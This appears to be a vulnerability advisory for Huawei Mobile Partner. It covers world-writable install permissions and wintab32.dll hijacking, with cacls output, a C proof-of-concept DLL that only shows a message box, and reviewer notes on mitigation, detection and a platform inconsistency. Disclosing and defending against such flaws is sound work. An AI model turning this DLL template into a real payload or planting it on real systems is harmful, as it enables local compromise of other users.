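/*
# Title: Huawei Mobile Partner Multiple Vulnerabilities
# Version: 23.009.05.03.1014
# Tested on: Windows XP SP2 en
# Vendor: http://www.huawei.com/
# Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide
# E-Mail: osanda[at]unseen.is
# Author: Osanda Malith Jayathissa
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only

#1| Local Privilege Escalation
--------------------------------

- Description
==============
Any user in the system can modify the legitimate binary to any kind of
malicious executable. The user could also place a malicious wintab32.dll
file inside the "Mobile Partner" folder and perform DLL hijacking easily.
If an attacker breaks into a low-privilege account, he could use this
application to escalate his privileges.

- Proof of Concept
===================

C:\Program Files>cacls "Mobile Partner"
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
                                BUILTIN\Users:(CI)F
                                NT SERVICE\TrustedInstaller:(ID)F
                                NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                NT AUTHORITY\SYSTEM:(ID)F
                                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                BUILTIN\Administrators:(ID)F
                                BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F

C:\Program Files>cd "Mobile Partner"

C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F

Reviewer notes on #1:
- Reading the listing: "F" is full control. The two BUILTIN\Users entries on
  the folder carry no (ID) flag, so they were set explicitly on the folder
  rather than inherited from "Program Files"; (OI)/(CI) propagate them to
  files and subfolders, which is where the inherited BUILTIN\Users:(ID)F on
  "Mobile Partner.exe" comes from.
- The listing contains NT SERVICE\TrustedInstaller entries, an account
  introduced with Windows Vista, so this output was presumably not captured
  on the XP SP2 system named in the header. Confirm the affected platforms
  before scoping remediation.
- The write access alone does not elevate anything: the replaced binary or
  planted DLL runs with the rights of whoever starts the application next.
  The page does not show any component running with higher privileges, so
  the impact depends on who uses the software on a shared machine.
- Mitigation: remove the explicit BUILTIN\Users full-control entries so the
  folder falls back to the inherited "Program Files" ACL, e.g.
  icacls "C:\Program Files\Mobile Partner" /reset /T
  and re-run the cacls checks above to confirm Users no longer hold F.
- Detection: alert on file creation or modification under the install
  folder by non-administrative accounts (e.g. Sysmon event ID 11) and
  compare the hashes of the installed binaries against the vendor package.

#2| Dll Hijacking Vulnerability (wintab32.dll)
-----------------------------------------------

Reviewer notes on #2:
- The listing below is only a load indicator: it shows a message box when
  the DLL is mapped into a process. The page does not show how the
  application requests wintab32.dll; presumably it is loaded by bare name,
  so the application folder is searched before the system directory.
- Vendor-side fix: load the library by full path, or restrict the search
  with LoadLibraryEx and LOAD_LIBRARY_SEARCH_SYSTEM32. This only helps once
  the folder ACL from #1 is corrected.
- Detection: image-load telemetry (e.g. Sysmon event ID 7) showing
  wintab32.dll mapped from the "Mobile Partner" folder instead of the
  system directory, particularly when the file is unsigned.
*/

/* The header name after #include is missing from the page; windows.h is the
 * header that declares BOOL, WINAPI, HANDLE, MessageBox and the DLL_* reason
 * codes used below. */
#include <windows.h>

/* Declared ahead of DllMain, which calls it before its definition. */
int owned(void);

/*
 * DLL entry point. Calls owned() when the library is attached to a process
 * and does nothing for the thread attach/detach and process detach reasons.
 *
 * hinstDLL    - module handle passed in by the loader (unused).
 * fdwReason   - one of the DLL_* reason codes.
 * lpvReserved - unused.
 *
 * Always returns TRUE, so the load is reported as successful.
 *
 * NOTE(review): DllMain executes under the loader lock and Microsoft's
 * DllMain guidance advises against calling User32 functions such as
 * MessageBox from it; the dialog can stall the host process.
 */
BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;

    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        owned();
        break; /* explicit break instead of falling through the cases below */
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }

    return TRUE;
}

/*
 * Shows the proof-of-concept message box.
 *
 * Returns 0. The original fell off the end of a function declared int; the
 * only caller in this listing ignores the result.
 */
int owned(void)
{
    MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING);
    return 0;
}

/*EOF*/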